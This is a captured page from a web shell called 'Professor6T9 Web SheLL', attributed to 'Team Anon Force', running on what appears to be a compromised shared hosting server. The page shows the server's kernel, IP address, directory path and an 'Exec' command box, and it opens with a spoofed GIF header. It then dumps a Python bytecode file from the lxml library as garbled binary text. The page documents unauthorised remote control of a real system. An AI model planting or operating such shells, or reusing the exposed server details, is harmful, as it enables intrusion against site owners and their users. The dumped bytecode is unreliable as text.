GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
lxml
/
html
/
__pycache__
[ HOME ]
Exec
Submit
File Name : _html5builder.cpython-311.pyc
� �|oi� � � � d Z ddlmZmZ ddlmZmZ G d� de� � Z G d� de� � Z G d� d ej � � Z d S )z� Legacy module - don't use in new code! html5lib now has its own proper implementation. This module implements a tree builder for html5lib that generates lxml html element trees. This module uses camelCase as it follows the html5lib style guide. � )�_base�etree)�htmlr c � � e Zd Zd� ZdS )�DocumentTypec �0 � || _ || _ || _ d S �N)�name�publicId�systemId)�selfr r r s �k/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib64/python3.11/site-packages/lxml/html/_html5builder.py�__init__zDocumentType.__init__ s � ��� � �� � �� � � � N)�__name__� __module__�__qualname__r � r r r r s# � � � � � �!� !� !� !� !r r c � � e Zd Zd� Zd� ZdS )�Documentc �"